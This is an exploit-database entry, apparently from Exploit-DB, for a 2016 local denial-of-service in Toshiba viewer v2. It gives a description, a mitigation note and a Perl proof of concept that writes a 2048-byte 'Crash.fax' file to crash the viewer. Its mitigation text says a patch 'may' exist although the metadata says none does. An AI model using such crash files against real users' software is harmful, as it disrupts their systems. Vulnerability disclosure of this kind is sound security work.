header-logo
Suggest Exploit
vendor:
Toshiba viewer
by:
JaMbA
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Toshiba viewer
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2016

Toshiba viewer v2 p3console Local Denial of Service

This exploit creates a file called 'Crash.fax' with a payload of 2048 bytes of 'A' characters, causing the Toshiba viewer v2 p3console to crash when the file is opened. This can lead to a denial of service (DoS) condition.

Mitigation:

To mitigate this vulnerability, users should avoid opening files from untrusted sources. The vendor may have released a patch or update to address this issue.
Source

Exploit-DB raw data:

#!/usr/bin/perl

# Exploit Title: Toshiba viewer v2  p3console Local Denial of Service
# Date: 02-02-2016
# Author: JaMbA
# Download: http://business.toshiba.com/downloads/KB/f1Ulds/9942/viewer2-cj242-v106.zip
# Version: 2
# Tested on: Windows 7

my $file= "Crash.fax";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.fax File Created successfully\n";
print "\ Oumaima & Tarta (Ahmadso best friend)\n";
close($FILE);